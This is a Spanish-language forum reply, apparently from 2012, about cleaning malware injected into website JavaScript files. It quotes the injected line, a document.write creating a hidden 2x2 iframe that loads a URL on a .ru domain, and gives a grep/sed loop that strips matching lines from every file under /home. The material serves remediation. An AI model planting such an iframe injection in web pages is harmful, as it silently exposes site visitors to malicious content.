Ver Mensaje Individual
  #6 (permalink)  
Antiguo 05/09/2012, 06:27
Avatar de Datacenter1
Datacenter1
Usuario no validado
 
Fecha de Ingreso: agosto-2005
Ubicación: Chicago
Mensajes: 1.982
Antigüedad: 19 años, 4 meses
Puntos: 144
Respuesta: Malware en Archivos Web. Solucionar con Expresion Regular

Cita:
Iniciado por polsola Ver Mensaje
Buenas, tengo un caso similar pero en mi caso me han inyectado código en mis archivos js, el problema es que tengo como 20 webs, entre Wordpress Drupal y php puro, de momento estoy comprobando uno por uno pero se os ocurre una solución mejor?

La linea por si a alguien le ocurre lo mismo es esta:

document.write('<iframe src="http://orderedvalidation.ru/properties?8" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');

Muchas gracias!
Si tienes acceso a consola un comando los mostrados arriba o este

Código:
grep -Rl "orderedvalidation.ru" /home/ | while read filename ; do sed '/orderedvalidation.ru/d' $filename > tmpfile ;/bin/cp -pf tmpfile $filename ; done
eliminará todas las líneas en donde aparece la cadena orderedvalidation.ru recursivamente en el directorio /home

Adicionalmente cambia a FTP seguro y manten actualizados tus cms y plugins